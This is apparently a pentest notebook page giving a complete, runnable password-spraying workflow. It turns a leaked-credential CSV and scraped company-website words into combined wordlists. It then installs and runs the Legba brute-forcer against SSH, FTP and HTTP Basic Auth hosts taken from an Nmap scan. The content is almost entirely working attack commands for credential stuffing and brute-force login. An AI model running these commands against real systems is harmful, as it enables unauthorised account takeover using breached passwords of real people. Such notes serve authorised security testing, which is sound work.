Network Password Spraying

Setup

mkdir Spray;cd Spray
command -v vared >/dev/null && vared -p 'Full Path to GNmap scan: ' -c GNMAP_FILE || read -p "Full Path to GNmap scan: " GNMAP_FILE
sudo apt install miller seclists cewl jq -y

# Install Legba
wget https://github.com/evilsocket/legba/releases/download/1.2.0/legba_1.2.0-1_amd64.deb && sudo dpkg -i legba_1.2.0-1_amd64.deb

Building Wordlist

See Basic Pentest Recon for notes on how to collect breach creds

# Get email_pass.txt
mlr --icsv --ocsv filter '$password != ""' then cut -f email,password Publicly_Leaked_Credential.csv | awk '{pos=index($0,","); if(pos==0){print;next} email=substr($0,1,pos-1); data=substr($0,pos+1); if(data~/^".*"$/) data=substr(data,2,length(data)-2); n=split(data,parts,/,/); for(i=1;i<=n;i++) print email","parts[i]}' | grep -v "email,password" | tr ',' ':' | sort -u >> email_pass.txt

# Get username_pass.txt
mlr --icsv --ocsv filter '$password != ""' then cut -f email,password Publicly_Leaked_Credential.csv | awk '{pos=index($0,","); if(pos==0){print;next} email=substr($0,1,pos-1); sub(/@.*/,"",email); data=substr($0,pos+1); if(data~/^".*"$/) data=substr(data,2,length(data)-2); n=split(data,parts,/,/); for(i=1;i<=n;i++) print email","parts[i]}' | grep -v "email,password" | tr ',' ':' | sort -u >> username_pass.txt

# Get raw passwords
mlr --icsv --ocsv filter '$password != ""' then cut -f email,password Publicly_Leaked_Credential.csv |  awk '{pos=index($0,","); if(pos==0){next} field=substr($0,pos+1); if(field~/^".*"$/) field=substr(field,2,length(field)-2); n=split(field,parts,/,/); for(i=1;i<=n;i++) print parts[i]}' | sort -u >> breach_passwords.txt

# Build combo wordlist
cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt ./combo_username_canidate.txt
cat username_pass.txt email_pass.txt | cut -d ':' -f 1 >> combo_username_canidate.txt
# Passwords
vared -p 'Company Website URL (Ex: https://www.example.com/): ' -c ORG_URL
cewl $ORG_URL -m 5 -x 12 -d 1 | tr -d ',' | awk -F' ' '{print $2,$1}' | sort -nr | head -25 | cut -d ' ' -f 2 | sort -u | grep -v "CeWL" > org_lingo.txt
cat breach_passwords.txt /usr/share/seclists/Passwords/Default-Credentials/default-passwords.txt org_lingo.txt > combo_password_candidate.txt
for COMBO_USERNAME in $(cat combo_username_canidate.txt); do for COMBO_PASSWORD in $(cat combo_password_candidate.txt); do echo "$COMBO_USERNAME:$COMBO_PASSWORD"; done; done > combo_creds_common-breach.txt

# Combine into master wordlist
cat email_pass.txt username_pass.txt combo_creds_common-breach.txt > spray.wordlist

Protocols

SSH

Spray passwords

cat "$GNMAP_FILE" | grep " 22/open/tcp/" | cut -d ' ' -f 2 | sort -u >> ssh.hosts
legba ssh -C spray.wordlist -T "@ssh.hosts" -O Password_Spraying_Results-SSH.txt

FTP

Spray passwords

cat "$GNMAP_FILE" | grep " 21/open/tcp/" | cut -d ' ' -f 2 | sort -u >> ftp.hosts
legba ftp -C spray.wordlist -T "@ftp.hosts" -O Password_Spraying_Results-FTP.txt

HTTP

Basic Auth

The below assumes you have already performed Directory Enumeration

Spray Passwords

command -v vared >/dev/null && vared -p 'Path to dir_enum folder (Ex. /home/kali/Q4-2025/dir_enum/): ' -c DIR_ENUM_PATH || read -p "Path to dir_enum folder (Ex. /home/kali/Q4-2025/dir_enum/): " DIR_ENUM_PATH
cat $DIR_ENUM_PATH/http.hosts $DIR_ENUM_PATH/enum_200-results.txt > http_endpoints.txt
nuclei -t ~/.local/nuclei-templates/http/technologies/basic-auth-detect.yaml -l http_endpoints.txt -je basic-auth.json
jq -r .[].url basic-auth.json > http.basic.hosts
legba http.basic -C spray.wordlist -T "@http.basic.hosts" -O Password_Spraying_Results-HTTP_Basic.txt

PreviousDirectory Enumeration NextAD Testing Checklist (Linux)

Last updated 5 days ago